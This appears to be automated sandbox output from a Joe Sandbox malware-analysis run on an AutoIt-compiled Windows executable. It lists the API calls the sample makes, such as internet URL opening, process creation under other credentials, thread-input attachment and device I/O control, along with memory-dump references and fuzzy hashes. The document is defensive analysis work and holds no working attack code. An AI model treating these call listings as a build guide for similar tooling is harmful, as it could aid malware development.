                                                                                                                                  Similarity
                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF49B7
                                                                                                                                    • Part of subcall function 00EF4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF4A60
                                                                                                                                    • Part of subcall function 00EF4A41: InternetCloseHandle.WININET(00000000), ref: 00EF4AFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EDBCD9
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00EDBCE0
                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00EDBCFA
                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EDBD29
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2621361867-0
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F088A3
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F088BD
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F088CB
                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F088D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                  APIs
                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00EF906D
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00EF907F
                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 00EF908C
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF90A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?), ref: 00EE2CB9
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrcpyW.KERNEL32(00000000,?,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE2CDF
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrcmpiW.KERNEL32(00000000,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?), ref: 00EE2D10
                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE1916
                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE193C
                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE1970
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                  • String ID: cdecl
                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE715C
                                                                                                                                  • _memset.LIBCMT ref: 00EE717D
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE71CF
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EE71D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1157408455-0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EE13EE
                                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EE1409
                                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EE141F
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00EE1474
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDC285
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC297
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC2AD
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC2C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE49EE
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A13
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A1D
                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC869D: __getptd_noexit.LIBCMT ref: 00EC869E
                                                                                                                                  • __lock.LIBCMT ref: 00EC811F
                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00EC813C
                                                                                                                                  • _free.LIBCMT ref: 00EC814F
                                                                                                                                  • InterlockedIncrement.KERNEL32(01126CF0), ref: 00EC8167
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 00EC8768
                                                                                                                                    • Part of subcall function 00EC8984: __mtinitlocknum.LIBCMT ref: 00EC8996
                                                                                                                                    • Part of subcall function 00EC8984: RtlEnterCriticalSection.NTDLL(00EC0127), ref: 00EC89AF
                                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00EC8775
                                                                                                                                  • __lock.LIBCMT ref: 00EC8789
                                                                                                                                  • ___addlocaleref.LIBCMT ref: 00EC87A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0E14D
                                                                                                                                  • _memset.LIBCMT ref: 00F0E15C
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F63EE0,00F63F24), ref: 00F0E18B
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F0E19D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                  • Opcode ID: d13948659d937f09d548eba18937e6d1bd4b744d0adc38d50fa57c345396af60
                                                                                                                                  • Instruction ID: 66048753771e7af6e61bfc6c6ea7b86eab73e5cd034a4bc0120c049fb443858e
                                                                                                                                  • Opcode Fuzzy Hash: d13948659d937f09d548eba18937e6d1bd4b744d0adc38d50fa57c345396af60
                                                                                                                                  • Instruction Fuzzy Hash: C5F082F1A40308BFF2105B65AC06F777AACDB0A394F000421FA14E51A2D7F78E11A6B4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                    • Part of subcall function 00EBB58B: BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0E860
                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00F0E86D
                                                                                                                                  • EndPath.GDI32(00000000), ref: 00F0E87D
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 00F0E88B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                  • Opcode ID: 5ae77bfa1e5b97a8f10e9d69dc0e041cbe8ca0fbd25ee8bca2e223af2220f9ef
                                                                                                                                  • Instruction ID: 27313c4ec3da5f4ee83c6ddb3ba4278dcaf734224d3cd7e4da5dd466eab12454
                                                                                                                                  • Opcode Fuzzy Hash: 5ae77bfa1e5b97a8f10e9d69dc0e041cbe8ca0fbd25ee8bca2e223af2220f9ef
                                                                                                                                  • Instruction Fuzzy Hash: 85F05E3100525DBBDB265F54AC09FCE3FA9AF06321F048101FA11210F187B55562EFA5
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDD640
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDD653
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDD65A
                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00EDD661
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                  • Opcode ID: 1e912c6c1f47b84302ffdf786bcab427513d5e769ac1a5f0272e897347097ce9
                                                                                                                                  • Instruction ID: 22598e40e8f68db359849497b45ec967753ffd02072c340ef0f703f89a240afa
                                                                                                                                  • Opcode Fuzzy Hash: 1e912c6c1f47b84302ffdf786bcab427513d5e769ac1a5f0272e897347097ce9
                                                                                                                                  • Instruction Fuzzy Hash: C5E03971109228BBEB311BA2DC0DEDB7F1CEF117A1F008011B51CA5460CA71D582DBE0
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00EBB0C5
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00EBB0CF
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00EBB0E4
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00EBB0EC
                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00F1ECFA
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F1ED07
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00F1ED20
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00F1ED39
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F1ED59
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1ED64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                  • Opcode ID: 87ffbd12a6b52cfc93b658520aa9c5fd20aedeb7bfb2df88be0fa807c66028f9
                                                                                                                                  • Instruction ID: 3e6f63be77d4bb0d926a682bcfc3b8dac869d2f2a91b7616941b454bfc4b7559
                                                                                                                                  • Opcode Fuzzy Hash: 87ffbd12a6b52cfc93b658520aa9c5fd20aedeb7bfb2df88be0fa807c66028f9
                                                                                                                                  • Instruction Fuzzy Hash: 0AE0ED31500244AEEB315F78AC4D7D97B21AB5533AF148266FA69580E2C7B18991EB11
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: c10c91b3fa0fc40244b3c7aaeb7062c394cb8d601924ee56d1b320ac268be549
                                                                                                                                  • Instruction ID: 606df57fdd61c3fa793db0f8fdee721ebe9eadc714563c3850c1a6065e7ec17c
                                                                                                                                  • Opcode Fuzzy Hash: c10c91b3fa0fc40244b3c7aaeb7062c394cb8d601924ee56d1b320ac268be549
                                                                                                                                  • Instruction Fuzzy Hash: 48E04FB1500208EFDB205F70CC4C6AA3FE5FF4C351F118405FD4A97210DA749882AB50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: 681ba02bf865d7e2c4b988ea3750359e5f5a4a3057d2fc202d8f50fcfabd6834
                                                                                                                                  • Instruction ID: ced23f0d2492bce00f4ffa7925e2a75ce020e81b8e22da1215837fff8cc25338
                                                                                                                                  • Opcode Fuzzy Hash: 681ba02bf865d7e2c4b988ea3750359e5f5a4a3057d2fc202d8f50fcfabd6834
                                                                                                                                  • Instruction Fuzzy Hash: DAE0BFB5500208EFDB105F70DC4C69A7FE5FB4C351F118415F94A97261DB7599429B50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: >$DEFINE
                                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                                  • Opcode ID: 0466e114041ead11bcc67010a770abf82ee50c68b9a36df0af3bec3d76f8c0d3
                                                                                                                                  • Instruction ID: f53e936cef6be350629458ed6cd1411b30e1100444738ed1222f4a92bf23de85
                                                                                                                                  • Opcode Fuzzy Hash: 0466e114041ead11bcc67010a770abf82ee50c68b9a36df0af3bec3d76f8c0d3
                                                                                                                                  • Instruction Fuzzy Hash: 55127C71E0021ADFCF24CF58D890AADBBB1FF49324F29815AE855AB351D734AE81DB50
                                                                                                                                  APIs
                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00EDECA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContainedObject
                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 00EEE785
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEE84E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00EA1B83
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00EA1B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA417D: __fread_nolock.LIBCMT ref: 00EA419B
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
